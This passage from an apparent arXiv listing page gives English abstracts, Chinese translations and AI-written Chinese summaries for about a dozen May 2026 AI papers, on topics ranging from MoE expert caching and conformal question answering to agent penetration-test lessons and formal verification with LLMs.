In recent years, financial institutions and firms have increasingly adopted synthetic data to address data scarcity and to generate counterfactual market scenarios. However, reproducing all the statistical properties of financial time series, commonly known as stylized facts, remains an open challenge for many existing general-purpose architectures. In this paper, we present a quality-aware generative framework that combines two classes of generative methods, demonstrating how their integration addresses existing limitations while enhancing the realism of synthetic data. Specifically, we first introduce CoMeTS-GAN (Correlated Multivariate Time Series GAN), a Conditional Generative Adversarial Network (C-GAN) designed to jointly generate mid-price and volume time-series for correlated stocks. We then show how our GAN architecture can be incorporated into state-of-the-art diffusion models to enhance the quality of generated correlation structures. Specifically, the GAN's Critic serves as a quality evaluation module that guides the diffusion process, enforcing learned correlation structures in the generated time-series. Our framework offers a lightweight and responsive solution for realistic stock market simulation, explicitly modeling inter-asset correlation structures. We experimentally validate our framework against leading generative architectures, showing that it more effectively captures the stylized facts of stock markets and models inter-asset correlations.

2605.27091 2026-05-27 cs.CL cs.AI 版本更新

MiRD: Reliable Set-Valued Prediction for Open-Ended Question Answering via Miscoverage Risk Decomposition

MiRD:通过误覆盖风险分解实现开放式问答的可靠集值预测

Anqi Hu, Zhiyuan Wang, Zijun Jia, Bo Fu

发表机构 * University of Electronic Science and Technology of China(电子科技大学) Beihang University(北京航空航天大学)

AI总结 提出MiRD两阶段框架,通过将整体误覆盖分解为采样失败和条件选择失败,在开放式问答中实现可靠的集值预测,控制采样风险和条件选择风险,并产生更紧的边界和更自适应的预测集。

详情
AI中文摘要

可靠的集值预测为缓解开放式问答中的幻觉提供了一种原则性方法,但现有的共形方法通常依赖于一个脆弱的假设:有限采样必须已经产生至少一个可接受的候选,或者违反此条件的校准示例被丢弃。在本文中,我们介绍了MiRD,一个两阶段框架,将整体误覆盖分解为采样失败和条件选择失败。在第一阶段,MiRD在固定预算下,对有限采样不产生可接受答案的概率建立了一个期望水平的边际上界。在第二阶段,基于采样成功,MiRD使用在整个校准集上定义的与接受性相关的非一致性分数来校准共形选择阈值,从而保持校准集的完整性。在三个开放式问答数据集和八个模型上,MiRD控制了采样风险、条件选择风险和整体误覆盖,同时产生了比PAC风格替代方案更紧的第一阶段边界,以及比仅成功校准更自适应的预测集。

英文摘要

Reliable set-valued prediction provides a principled way to mitigate hallucinations in open-ended question answering (QA), yet existing conformal approaches typically rely on a fragile premise: finite sampling must already produce at least one admissible candidate, or calibration examples violating this condition are discarded. In this paper, we introduce MiRD, a two-stage framework that decomposes overall miscoverage into sampling failure and conditional selection failure. In Stage I, MiRD establishes an expectation-level marginal upper bound on the probability that finite sampling produces no admissible answer under a fixed budget. In Stage II, conditioned on sampling success, MiRD calibrates a conformal selection threshold using admission-correlated nonconformity scores defined over the full calibration set, thereby preserving calibration-set integrity. Across three open-ended QA datasets and eight models, MiRD controls sampling risk, conditional selection risk, and overall miscoverage, while yielding tighter first-stage bounds than PAC-style alternatives and more adaptive prediction sets than successful-only calibration.
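The two-stage decomposition can be written out with the law of total probability. The notation is introduced here for illustration and is not taken from the paper: $S$ is the event that the sampled candidates contain at least one admissible answer, and $\alpha_1$, $\alpha_2$ are the risk levels controlled in Stage I and Stage II. The sketch also assumes that the prediction set is chosen from the sampled candidates, so coverage is impossible whenever sampling fails.

```latex
\begin{align*}
\Pr[\text{miscoverage}]
  &= \Pr[S^{c}] + \Pr[\text{miscoverage} \mid S]\,\Pr[S] \\
  &\le \Pr[S^{c}] + \Pr[\text{miscoverage} \mid S] \\
  &\le \alpha_1 + \alpha_2 .
\end{align*}
```

Under these assumptions, bounding the sampling-failure probability by $\alpha_1$ and the conditional selection failure by $\alpha_2$ is enough to bound overall miscoverage by their sum.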

2605.27082 2026-05-27 cs.AI 版本更新

Can Broad Biomedical Knowledge be Contextualized into Scenario-Grounded Propositions?

广泛的生物医学知识能否被情境化为基于场景的命题?

Qingyuan Zeng, Ziyang Chen, Pengxiang Cai, Zixin Guan, Anglin Liu, Lang Qin, Xinyao Lai, Jintai Chen

发表机构 * The Hong Kong University of Science and Technology (Guangzhou)(香港科技大学(广州)) Guangzhou University of Chinese Medicine(广州中医药大学)

AI总结 提出SCENE双层多智能体框架,通过迭代搜索将广泛生物医学知识转化为证据支持的场景化命题,并在临床试验和LINCS L1000研究中验证其有效性。

详情
AI中文摘要

生物医学发现通常需要将广泛的生物医学知识与特定的实验或临床数据联系起来。背景知识提示相关机制,但通常过于泛化,无法直接映射到数据集变量;而数据驱动模式可能具有数据集特异性且难以从机制上解释。我们将这一缺失环节研究为知识情境化:将广泛的生物医学知识转化为有证据支持的、基于场景的命题,供领域专家检查、重现和验证。我们提出SCENE,一个双层多智能体框架,将知识情境化视为迭代搜索。上层将广泛知识转化为搜索方向,并将其锚定在数据集模式中。下层通过多目标优化执行这些方向,以识别在证据强度和数据支持之间取得平衡的具体命题。两层之间的反馈逐步细化搜索。我们在两个场景中评估SCENE:在临床试验场景中发现具有异质性治疗益处的患者亚组,以及在LINCS L1000研究中识别特定情境下的生物学反应。在临床试验中,SCENE发现了具体且支持充分的亚组,并优于现有基线。在L1000研究中,SCENE识别出具有强靶标-响应匹配和高阳性率的扰动情境。这些结果表明,SCENE弥合了广泛知识与场景特定证据之间的差距,为后续验证生成了可追溯、可检查的假设。

英文摘要

Biomedical discovery often requires connecting broad biomedical knowledge with specific experimental or clinical data. Background knowledge suggests relevant mechanisms but is usually too general to map directly onto dataset variables, while data-driven patterns can be dataset-specific and hard to interpret mechanistically. We study this missing link as knowledge contextualization: transforming broad biomedical knowledge into evidence-supported, scenario-grounded propositions that domain experts can inspect, replay, and validate. We propose SCENE, a bi-level multi-agent framework that treats knowledge contextualization as iterative search. The upper level converts broad knowledge into search directions and grounds them in the dataset schema. The lower level executes these directions through multi-objective optimization to identify concrete propositions that balance evidential strength and data support. Feedback between the two levels progressively refines the search. We evaluate SCENE in two settings: discovering patient subgroups with heterogeneous treatment benefits in clinical trial scenarios, and identifying context-specific biological responses in LINCS L1000 studies. In clinical trials, SCENE discovers specific, well-supported subgroups and outperforms existing baselines. In L1000 studies, SCENE identifies perturbational contexts with strong target-response matching and high positive rates. These results show that SCENE bridges broad knowledge and scenario-specific evidence, producing traceable, inspectable hypotheses for follow-up validation.

2605.27081 2026-05-27 cs.LG cs.AI cs.DC 版本更新

ReMoE: Boosting Expert Reuse through Router Fine-Tuning in Memory-Constrained MoE LLM Inference

ReMoE: 在内存受限的MoE大模型推理中通过路由器微调提升专家重用

Xiongwei Zhu, Xiaojian Liao, Tianyang Jiang, Yusen Zhang, Liang Wang, Limin Xiao

发表机构 * School of Computer Science and Engineering, Beihang University, Beijing 100191, China(北京航空航天大学计算机科学与工程学院) Huawei Technologies Ltd(华为技术有限公司)

AI总结 提出ReMoE路由器微调框架,通过偏向近期选中的专家实现时间稳定的路由,减少专家从外部存储的获取次数,在保持下游任务性能的同时提升专家重用26%,并在实际系统中实现8.4%的吞吐量提升和1.77-1.99倍的解码加速。

Comments Accepted at the 43rd International Conference on Machine Learning (ICML 2026)

详情
AI中文摘要

细粒度混合专家(MoE)模型对每个token仅稀疏激活一部分专家,在保持高模型容量的同时减少激活计算。然而,在内存受限的推理场景中,只能缓存少量专家。未缓存的专家必须从慢速外部存储(如UFS)获取,导致频繁的驱逐和大量的I/O开销。我们提出ReMoE,一个路由器微调框架,旨在提升token级别的专家重用。ReMoE使路由器偏向近期选中的专家,产生时间稳定的路由,更好地匹配缓存局部性约束。通过增加短时专家重用,ReMoE减少了从存储中获取专家,且不增加推理计算开销。在DeepSeek和Qwen模型上的实验表明,ReMoE在保持下游任务性能的同时将专家重用提升了26%。实际系统评估进一步证实了这些优势:在vLLM GPU-CPU专家卸载下,输出吞吐量提升8.4%;在Jetson Orin NX上的llama.cpp中,TPOT降低43.6-49.8%,对应不同工作负载下1.77-1.99倍的解码加速。检查点和使用说明见https://github.com/BUAA-OSCAR/ReMoE。

英文摘要

Fine-grained Mixture-of-Experts (MoE) models sparsely activate only a subset of experts per token, reducing activated computation while maintaining high model capacity. However, in memory-constrained inference scenarios, only a small set of experts can be cached. Experts not in the cache must be fetched from slow external storage (e.g., UFS), leading to frequent evictions and substantial I/O overhead. We propose ReMoE, a router fine-tuning framework designed to boost token-wise expert reuse. ReMoE biases the router toward recently selected experts, producing temporally stable routing that better matches cache locality constraints. By increasing short-horizon expert reuse, ReMoE reduces expert fetches from storage without adding inference-time computation. Experiments on DeepSeek and Qwen models show that ReMoE improves expert reuse by 26% while maintaining downstream task performance. Real-system evaluations further confirm these benefits, improving output throughput by 8.4% under vLLM GPU-CPU expert offloading and reducing TPOT by 43.6-49.8% under llama.cpp on Jetson Orin NX, corresponding to a 1.77-1.99$\times$ decode speedup across diverse workloads. Checkpoints and usage instructions are available at https://github.com/BUAA-OSCAR/ReMoE.
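To make the cache-locality argument concrete, the sketch below measures the hit rate of an LRU expert cache on two synthetic routing traces and converts a TPOT reduction into the implied decode speedup. The LRU policy, the one-expert-per-token traces, and the cache size are assumptions chosen for illustration; the abstract does not describe the cache policy used in the actual systems.

```python
from collections import OrderedDict

def lru_hit_rate(trace, capacity):
    """Fraction of expert requests served from an LRU cache of the given capacity."""
    cache = OrderedDict()
    hits = 0
    for expert in trace:
        if expert in cache:
            hits += 1
            cache.move_to_end(expert)      # mark as most recently used
        else:
            if len(cache) >= capacity:
                cache.popitem(last=False)  # evict the least recently used expert
            cache[expert] = True
    return hits / len(trace)

def speedup_from_tpot_reduction(reduction):
    """Decode speedup implied by a fractional reduction in time per output token."""
    return 1.0 / (1.0 - reduction)

# Hypothetical traces over 8 experts with room for 4 in the cache.
scattered = [t % 8 for t in range(64)]       # cycles through all experts
sticky = [(t // 8) % 8 for t in range(64)]   # each expert reused 8 tokens in a row

scattered_rate = lru_hit_rate(scattered, capacity=4)
sticky_rate = lru_hit_rate(sticky, capacity=4)
```

In this toy setting the cycling trace never hits the cache, while the temporally stable trace misses only once per expert. The conversion function also shows that the reported 43.6% and 49.8% TPOT reductions correspond to roughly 1.77x and 1.99x decode speedups.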

2605.27079 2026-05-27 cs.LG cs.AI cs.RO 版本更新

Trust Region Q Adjoint Matching

信任区域Q伴随匹配

Yonghoon Dong, Kyungmin Lee, Changyeon Kim, Jaehyuk Kim, Jinwoo Shin

发表机构 * KAIST AI(韩国科学技术院人工智能) Seoul National University(首尔国立大学) RLWRLD

AI总结 针对预训练流策略的离策略强化学习不稳定性,提出信任区域Q伴随匹配方法,通过投影对偶下降自适应控制路径空间KL散度,实现稳定微调,在50个OGBench任务中离线RL成功率达68%。

详情
AI中文摘要

由于多步采样过程带来的优化不稳定性,预训练流策略的离策略强化学习仍然具有挑战性。最近,带有伴随匹配的Q学习(QAM)通过将问题重新表述为一个具有学习评论家的无记忆随机最优控制(SOC)问题来解决这一问题。然而,QAM继承了评论家引导改进的根本脆弱性:当评论家病态时,小的评论家误差会被放大,通常导致模型崩溃。本文引入了信任区域Q伴随匹配(TRQAM),一种稳定的离策略微调算法,通过投影对偶下降自适应地控制与预训练流策略的路径空间KL散度。具体来说,我们优化SOC动力学中的信任区域参数$\lambda$,并从理论上证明路径空间KL可以用$\lambda$的闭式函数表示。因此,我们的方法可以精确控制与预训练流策略的偏差,实现稳定的离策略强化学习。通过在50个OGBench任务上的实验,TRQAM在离线强化学习和离线到在线强化学习中都持续优于先前的方法。特别是,TRQAM在离线强化学习中实现了68%的总体成功率,显著优于最强基线的46%。

英文摘要

Off-policy reinforcement learning of pretrained flow policies remains challenging due to the instability of optimization arising from the multi-step sampling process. Recently, Q-learning with Adjoint Matching (QAM) addressed this issue by reformulating the problem as a memoryless stochastic optimal control (SOC) problem with a learned critic. However, QAM inherits a fundamental fragility of critic-guided improvement: small critic errors are amplified when critics are ill-conditioned, often leading to model collapse. This paper introduces Trust Region Q-Adjoint Matching (TRQAM), a stable off-policy fine-tuning algorithm that adaptively controls the path-space KL with pretrained flow policies through projected dual descent. Specifically, we optimize the trust-region parameter $\lambda$ in SOC dynamics, and theoretically show that the path-space KL can be represented by a closed-form function of $\lambda$. As a result, our method can precisely control the deviation from pretrained flow policies, achieving stable off-policy RL. Through experiments on 50 OGBench tasks, TRQAM consistently outperforms prior methods in both offline RL and offline-to-online RL. In particular, TRQAM achieves an overall success rate of 68% in offline RL, substantially improving on the strongest baseline's 46%.
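The idea of tuning a trust-region parameter against a closed-form KL can be illustrated on a toy problem that is not the paper's setting. Assume a one-dimensional Gaussian reference policy with standard deviation `sigma` and a linear reward with slope `b`. The KL-regularized optimum then shifts the mean by `b * sigma**2 / lam`, giving a KL of `b**2 * sigma**2 / (2 * lam**2)`. The projected update below, including its step size and floor `lam_min`, is a generic dual update chosen for this sketch and should not be read as TRQAM's actual rule.

```python
def toy_kl(lam, b=1.0, sigma=1.0):
    """KL to the reference policy in the toy Gaussian problem: b^2 sigma^2 / (2 lam^2)."""
    return (b * sigma) ** 2 / (2.0 * lam ** 2)

def projected_dual_descent(eps, lam=2.0, lr=0.5, steps=200, lam_min=1e-3):
    """Adjust lam until the closed-form KL meets the trust-region budget eps."""
    for _ in range(steps):
        # Raise lam when the KL exceeds the budget, lower it otherwise,
        # then project back onto lam >= lam_min.
        lam = max(lam_min, lam + lr * (toy_kl(lam) - eps))
    return lam

# With b = sigma = 1 and eps = 0.5, the budget is met exactly at lam = 1.
lam_star = projected_dual_descent(eps=0.5)
```

In this toy case the iteration settles at the value of `lam` where the closed-form KL equals the budget, which is the sense in which a closed-form KL makes the deviation from the reference policy directly controllable.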

2605.27072 2026-05-27 cs.CL cs.AI 版本更新

E3: Issue-Level Backtesting for Automated Research Critique

E3: 面向自动化研究评论的问题级回测

Yashwardhan Chaudhuri, Sanyam Jain, Paridhi Mundra

AI总结 提出E3自动化评论助手,通过问题级回测协议评估其在识别研究论文技术问题上的表现,相比人类评审和LLM基线实现最高召回率。

详情
AI中文摘要

我们提出E3,一个自动化评论助手,通过识别研究论文中与决策相关的技术问题来增强评审者和工程团队。对于每个问题,E3报告其性质、位置、对贡献的影响以及解决该问题所需的分析或证据,涵盖无根据的主张、缺失的消融实验、弱基线、隐藏假设、有效性威胁和数据泄露风险。为了在没有污染混杂因素的情况下评估E3,我们采用问题级回测协议:语料库仅限于每个自动化来源训练截止日期之后发表的论文,并且对于每篇论文,一个仅观察匿名评审的元裁判将每个问题-来源对标记为“捕获”、“部分”或“遗漏”。应用于100篇ICLR 2026论文和4598个被评判的问题行,将E3与ICLR人类评审以及基于OpenAI的gpt-5.4和Anthropic的claude-opus-4-6构建的两个提示匹配的LLM基线进行比较,使用元裁判gpt-5.5,E3在每个聚合指标上达到最高召回率。包含部分的召回率达到90.2%,比GPT高15.5个百分点,比Claude高17.1个百分点,比人类评审高29.2个百分点,严格召回率保持顺序为65.8%。在人类评审提出的问题上,E3恢复了89.6%;在人类评审遗漏的问题上,它额外发现了1635行被纳入评判联合集,比次优来源多406行。语料库、基线提示、裁判提示模板和评估代码已发布。

英文摘要

We present E3, an automated review assistant that augments reviewers and engineering teams by identifying decision-relevant technical concerns in research papers. For each concern, E3 reports its nature, its location, its bearing on the contribution, and the analysis or evidence that would resolve it, covering unsupported claims, missing ablations, weak baselines, hidden assumptions, threats to validity, and leakage risks. To evaluate E3 without contamination confounds we adopt an issue-level backtesting protocol: the corpus is restricted to papers postdating the training cutoff of every automated source, and for each paper a meta-judge that observes only anonymised reviews labels every issue-source pair as Caught, Partial, or Missed. Applied to 100 ICLR 2026 papers and 4598 judged issue rows, comparing E3 against the ICLR human reviews and two prompt-matched LLM baselines built on gpt-5.4 from OpenAI and claude-opus-4-6 from Anthropic, with meta-judge gpt-5.5, E3 attains the highest recall on every aggregate metric. Partial-inclusive recall reaches 90.2 percent, which is 15.5 points over GPT, 17.1 points over Claude, and 29.2 points over the human reviews, and strict recall preserves the ordering at 65.8 percent. On concerns raised by the human reviewers, E3 recovers 89.6 percent; on concerns the human reviewers missed it surfaces 1635 additional rows admitted into the judged union, 406 above the next-best source. Corpus, baseline prompts, judge prompt template, and evaluation code are released.
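As a rough illustration of the two recall figures, the sketch below computes strict and partial-inclusive recall from a list of judge labels. The abstract does not spell out the denominators, so this assumes strict recall counts only Caught rows and partial-inclusive recall counts Caught plus Partial rows, both over all judged rows for one source; the function name and sample labels are hypothetical.

```python
from collections import Counter


def recall_metrics(labels):
    """Return (strict, partial_inclusive) recall for one source's judged rows."""
    counts = Counter(labels)
    total = counts["Caught"] + counts["Partial"] + counts["Missed"]
    if total == 0:
        raise ValueError("no judged rows")
    strict = counts["Caught"] / total
    partial_inclusive = (counts["Caught"] + counts["Partial"]) / total
    return strict, partial_inclusive


# Made-up labels for illustration only; not data from the paper.
labels = ["Caught"] * 6 + ["Partial"] * 3 + ["Missed"] * 1
strict, partial_inclusive = recall_metrics(labels)
print(f"strict={strict:.2f} partial-inclusive={partial_inclusive:.2f}")
```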

2605.27071 2026-05-27 cs.AI 版本更新

Traceable Knowledge Graph Reasoning Enables LLM-Assisted Decision Support for Industrial VOCs in the Steel Industry

可溯源知识图谱推理助力钢铁行业工业VOCs的LLM辅助决策支持

Changqing Su, Yu Ding, Zuhong Lin, Hongyu Liu, Xi He, Zheng Zeng, Liqing Li

发表机构 * Hunan Key Laboratory of Carbon Neutrality and Intelligent Energy, School of New Energy and Environment, Hunan University of Technology and Business(湖南碳中和与智能能源重点实验室,新能环境学院,湖南科技商务大学) Aerospace Kaitian Environmental Technology Co., Ltd.(航天凯天环境科技有限公司) School of Energy Science and Engineering, Central South University(能源科学与工程学院,中南大学)

AI总结 针对钢铁行业VOCs治理知识分散、通用大模型易产生幻觉的问题,提出基于知识图谱增强的多智能体问答系统Chat-ISV,通过拓扑优化、多智能体路由和源回溯检索实现高可靠性决策支持。

详情
AI中文摘要

钢铁行业挥发性有机化合物(VOCs)治理的关键知识分散在非结构化的科学文献中,使得整合工艺、污染物和控制技术证据变得困难,并增加了通用大语言模型(LLM)在回答低频工业问题时产生幻觉的风险。为此,我们开发了Chat-ISV,一个知识图谱(KG)增强的多智能体问答系统,该系统解析精选的钢铁行业VOCs文献语料库,构建包含27180个节点和81779条语义边的Neo4j知识图谱,并结合提示约束提取、以块为中心的拓扑优化、多智能体路由、源回溯检索、本地文献检索、开放域知识访问和交互式子图可视化。基准测试和400份专家盲评表明,拓扑优化将孤立节点从57%降至4.08%,Chat-ISV实现了高事实可靠性,精确率96.93%,召回率72.63%,F1分数0.830,平均得分1.69/2.00。通过将碎片化的环境工程文献转化为可溯源、可查询、面向决策支持的知识,Chat-ISV为专业工业领域中可靠的LLM部署和智能污染控制决策支持建立了一种可扩展的环境信息学范式。

英文摘要

Key knowledge for steel-industry volatile organic compounds (VOCs) governance is scattered across unstructured scientific literature, making it difficult to integrate process, pollutant, and control-technology evidence and increasing the risk of hallucination when general large language models (LLMs) answer low-frequency industrial questions. Here we developed Chat-ISV, a knowledge graph (KG) enhanced multi-agent Q&A system that parses a curated steel-industry VOCs literature corpus, constructs a Neo4j KG with 27180 nodes and 81779 semantic edges, and combines prompt-constrained extraction, chunk-centered topology optimization, multi-agent routing, source-backtracking retrieval, local literature retrieval, open-domain knowledge access, and interactive subgraph visualization. Benchmark tests and 400 expert blind evaluations showed that topology optimization reduced isolated nodes from 57% to 4.08% and that Chat-ISV achieved high factual reliability, with 96.93% precision, 72.63% recall, an F1-score of 0.830, and a mean score of 1.69/2.00. By converting fragmented environmental-engineering literature into traceable, queryable, and decision-support-oriented knowledge, Chat-ISV establishes a scalable environmental-informatics paradigm for reliable LLM deployment and intelligent pollution-control decision support in specialized industrial domains.
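The reported F1-score can be checked against the reported precision and recall, assuming the standard harmonic-mean definition of F1 (the abstract does not state which variant was used). The helper name is illustrative.

```python
def f1_score(precision, recall):
    """Harmonic mean of precision and recall."""
    if precision + recall == 0:
        return 0.0
    return 2 * precision * recall / (precision + recall)


# Precision and recall as reported in the abstract.
f1 = f1_score(0.9693, 0.7263)
print(f"{f1:.3f}")  # prints 0.830
```

Under that assumption the three reported figures are mutually consistent.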

2605.27068 2026-05-27 cs.CL cs.AI cs.MA 版本更新

QUACK: Questioning, Understanding, and Auditing Communicated Knowledge in Multimodal Social Deduction Agents

QUACK: 多模态社交推理智能体中的沟通知识质疑、理解与审计

Ye Yuan, Rui Song, Weien Li, Zeyu Li, Haochen Liu, Xiangyu Kong, Changjiang Han, Yonghan Yang, Zichen Zhao, Zixuan Dong, Fuyuan Lyu, Bowei He, Haolun Wu, Jikun Kang, Xue Liu

发表机构 * McGill University(麦吉尔大学) Mila - Quebec AI Institute(魁北克人工智能研究所) University of Cambridge(剑桥大学) MBZUAI - Mohamed bin Zayed University of Artificial Intelligence(MBZUAI - 穆罕默德·本·扎耶德人工智能大学) University of Toronto(多伦多大学) Salesforce

AI总结 提出QUACK框架,通过游戏结果、行为轨迹和话语一致性三级评估,自动审计多模态社交推理智能体语言与感知行为的一致性,发现最强智能体仍有15.1%的空间幻觉和过半无据指控。

详情
AI中文摘要

社交推理游戏已成为探测大型语言模型智能体推理、欺骗、协调和信念建模的热门测试平台。然而,大多数环境仅通过胜率等游戏结果评分,且主要局限于纯文本交互,难以判断智能体的语言是否真正基于其感知和行动,也难以识别其行为背后的失败模式。为填补这一空白,我们引入了QUACK,一个用于审计多模态社交推理中智能体语言基础的开源环境和评估框架。QUACK在三个层面评估智能体:游戏结果、行为轨迹和话语级一致性。其核心的陈述验证流水线从引擎日志重建每个智能体的真实轨迹,并对照检查每个讨论声明,自动标记空间幻觉、无据指控、欺骗崩溃和语言-行动不一致。在同质和跨模型对抗设置下评估三个前沿视觉语言模型,我们发现即使是最强的智能体,其可验证的空间声明中有15.1%是幻觉,且超过一半的指控缺乏有据证据。我们在https://github.com/AAAAA-Academia-Attractions/QUACK发布完整的引擎、评估框架、工具包和日志。

英文摘要

Social deduction games have become a popular testbed for probing reasoning, deception, coordination, and belief modeling in Large Language Model (LLM) agents. However, most environments are scored only by game outcomes such as win rates and remain largely limited to text-only interaction, making it difficult to tell whether an agent's language is actually grounded in what it perceived and did, or to identify the failure modes underlying its behavior. To address this gap, we introduce QUACK, an open-source environment and evaluation framework for auditing the grounding of agent language in multimodal social reasoning. QUACK evaluates agents at three levels: game outcomes, behavioral trajectories, and utterance-level consistency. Its core Statement Verification Pipeline reconstructs each agent's ground-truth trajectory from engine logs and checks every discussion claim against it, automatically flagging spatial hallucination, unsupported accusation, deception collapse, and language-action inconsistency. Evaluating three frontier VLMs in both homogeneous and cross-model adversarial settings, we find that even the strongest agent hallucinates 15.1% of its verifiable spatial claims and makes over half of its accusations without grounded evidence. We release the full engine, evaluation framework, toolkit, and logs at https://github.com/AAAAA-Academia-Attractions/QUACK.

2605.27051 2026-05-27 cs.SE cs.AI 版本更新

ConVer: Using Contracts and Loop Invariant Synthesis for Scalable Formal Software Verification

ConVer:使用合约和循环不变式合成实现可扩展的形式化软件验证

Muhammad A. A. Pirzada, Weiqi Wang, Yiannis Charalambous, Konstantin Korovin, Lucas C. Cordeiro

发表机构 * The University of Manchester(曼彻斯特大学)

AI总结 提出一种自上而下的组合验证工具ConVer,利用大语言模型合成函数合约,并通过CEGAR-CEGIS循环迭代精炼合约,以解决大规模C程序形式化验证中的状态空间爆炸问题。

Comments 12 pages; 6 figures

详情
AI中文摘要

大型C程序的形式化验证受到状态空间爆炸的阻碍:有界模型检验(BMC)工具必须通过展开所有嵌套结构来编码整个状态空间直至预定边界。我们提出了ConVer,一种自上而下的组合验证工具。给定一个带有顶层断言的C程序,ConVer自上而下地分解验证:它使用大语言模型(LLM)从系统属性中合成函数合约,然后在CEGAR-CEGIS循环中交替进行系统级和函数级检查,每当检查失败时通过SMART ICE学习精炼合约。我们在四个难度递增的基准测试套件上评估了ConVer,并与其他最先进(SOTA)工具进行了比较。在包含45个简单C程序的Frama-C基准测试中,ConVer在三个LLM后端上实现了82-96%的验证成功率,其中93-95%的收敛程序仅需一次CEGAR-CEGIS迭代。在X.509解析器基准测试(6个程序)和LF2C-Simple套件(17个程序)上,ConVer分别实现了33-50%和82-88%的成功率。在包含11个递归和循环密集型程序的VerifyThis套件上,预抽象策略实现了55-64%的成功率。此外,我们提出了ESBMC-LF,一个预处理工具,它将LF模型转换为C语言,同时保留LF文件的属性,使ConVer能够验证它们。我们使用ESBMC-LF将LF验证器基准测试转换为C语言;我们将这些称为LF-Hard。我们表明,ConVer总体上成功验证了67%的LF-Hard基准测试。

英文摘要

Formal verification of large C programs is impeded by state-space explosion: Bounded Model Checking (BMC) tools must encode the entire state space up to the predetermined bound by unrolling all nested constructs. We present ConVer, a top-down compositional verification tool. Given a C program with a top-level assertion, ConVer decomposes verification top-down: it uses a large language model (LLM) to synthesise function contracts from the system property, then alternates system-level and function-level checks in a CEGAR-CEGIS loop, refining contracts whenever a check fails via SMART ICE learning. We evaluate ConVer on four benchmark suites of increasing difficulty and against other state-of-the-art (SOTA) tools. On the Frama-C benchmark of 45 simple C programs, ConVer achieves 82-96% verification success across three LLM backends, with 93-95% of converged programs requiring only a single CEGAR-CEGIS iteration. On the X.509 parser benchmark (6 programs) and the LF2C-Simple suite (17 programs), ConVer achieves 33-50% and 82-88% success, respectively. On the VerifyThis suite of 11 recursive and loop-intensive programs, the Pre-Abstraction strategy achieves 55-64% success. In addition, we present ESBMC-LF, a preprocessor tool that converts LF models to C while preserving the properties of the LF files, enabling ConVer to verify them. We transpile the LF Verifier Benchmarks to C using ESBMC-LF; we refer to the resulting programs as LF-Hard. We show that ConVer successfully verifies 67% of the LF-Hard benchmarks overall.

2605.27042 2026-05-27 cs.CR cs.AI 版本更新

Lessons from Penetration Tests on Large-Scale Agent Systems

大规模智能体系统渗透测试的经验教训

Kevin Eykholt, Dhilung Kirat, Xiaokui Shu, Jiyong Jang, Frederico Araujo, Ian Molloy

发表机构 * IBM Research(IBM研究院)

AI总结 本文通过对2025年专有智能体产品的两次渗透测试,评估了AI智能体的安全态势是否有所改善,并指出许多安全漏洞并非全新,而是反映了先前计算系统中长期存在的重复性弱点类别。

Comments Accepted at SAGAI 2026

详情
AI中文摘要

随着AI系统获得越来越多的自主性和执行能力,发现的安全漏洞数量持续上升。然而,许多这些漏洞并非根本上的新颖,而是反映了先前计算系统中长期观察到的重复性弱点类别。具有执行能力的AI智能体实际上是无限的自修改程序,与计算栈的多个层进行广泛交互。这种广泛的交互表面给开发者带来了显著的安全负担,他们必须推理并保护复杂的跨层行为。先前的研究主要集中在开源智能体和智能体框架中的漏洞。相比之下,专有智能体系统——在更严格的编码标准和正式审查流程下开发——是否表现出类似的安全弱点仍不清楚。在本文中,我们展示了2025年对专有智能体产品进行的两次渗透测试的结果,并评估了自这些评估以来AI智能体的安全态势是否有所改善。

英文摘要

As AI systems gain increasing autonomy and execution capability, the number of discovered security vulnerabilities continues to rise. However, many of these vulnerabilities are not fundamentally novel, but instead reflect recurring classes of weaknesses long observed in prior computing systems. Execution-capable AI agents are effectively unbounded, self-modifying programs that interact extensively with multiple layers of the computing stack. This broad interaction surface imposes a significant security burden on developers, who must reason about and secure complex cross-layer behaviors. Prior research has primarily focused on vulnerabilities in open-source agents and agent frameworks. In contrast, it remains unclear whether proprietary agent systems -- developed under stricter coding standards and formal review processes -- exhibit similar security weaknesses. In this paper, we present findings from two penetration tests conducted in 2025 against proprietary agent products and evaluate whether the security posture of AI agents has improved since these assessments.

2605.27033 2026-05-27 cs.CL cs.AI cs.LG 版本更新

Tracing Computation Density in LLMs

追踪LLMs中的计算密度

Corentin Kervadec, Iuliia Lysova, Iuri Macocco, Marco Baroni, Gemma Boleda

发表机构 * Universitat Pompeu Fabra(庞培法布拉大学) ICREA

AI总结 提出s-Trace方法估计最优子图,发现LLM计算分为早期稀疏核心和后期密集细化两个阶段,且计算量与模型不确定性相关。

详情
AI中文摘要

基于Transformer的大型语言模型(LLMs)由数十亿个参数组成,这些参数排列在深度和宽度都很大的计算图中,但尚不清楚它们是否对所有输入都充分利用了全部容量。我们引入了s-Trace方法,以有效估计最能近似完整模型输出的大小为s的子图。通过这种方法,我们发现各种LLM中的计算组织成两个不同的阶段。一个主要由早期层节点组成的小子图可以重建完整模型输出分布的头部。添加更多节点(主要位于后期层,且越来越多地由注意力头组成)会导致近似完整输出分布的逐步细化。此外,我们发现每个输入所需的计算量与模型不确定性相关,并且更稀疏的子图编码浅层统计信息,例如单字频率。总体而言,我们的结果表明,有效的LLM计算中存在一致的模块化组织,其中稀疏的早期层核心提供粗略预测,然后通过后期层中更密集的计算进一步细化。

英文摘要

Transformer-based large language models (LLMs) are composed of billions of parameters arranged in deep and wide computational graphs, but it is not clear whether they exploit their full capacity for all inputs. We introduce the s-Trace method to efficiently estimate the subgraph of size s that best approximates the full model output. With this method, we find the computation in a variety of LLMs to be organized in two distinct phases. A small subgraph mostly composed of early-layer nodes can reconstruct the head of the full model output distribution. Adding further nodes, mostly located in later layers and increasingly consisting of attention heads, leads to incremental refinements in approximating the full output distribution. Moreover, we find that the amount of computation needed per input correlates with model uncertainty, and that sparser subgraphs encode shallow statistics, such as unigram frequency. Overall, our results suggest a consistent modular organization in effective LLM computation, with a sparse early-layer core providing a rough prediction that is further refined through denser computations in later layers.

2605.27028 2026-05-27 cs.LG cs.AI 版本更新

Less is More: Early Stopping Rollout for On-Policy Distillation

少即是多:用于在线策略蒸馏的早停展开

Zhou Ziheng, Jiaqi Li, Huacong Tang, Ying Nian Wu, Demetri Terzopoulos

发表机构 * University of California, Los Angeles(加州大学洛杉矶分校) Beijing Institute of General Artificial Intelligence(北京通用人工智能研究院)

AI总结 针对在线策略蒸馏中存在的“离策略教师衰减”问题,提出早停展开(ESR)方法,将展开生成限制在响应的前几个token,从而提升性能、GPU效率和训练稳定性。

详情
AI中文摘要

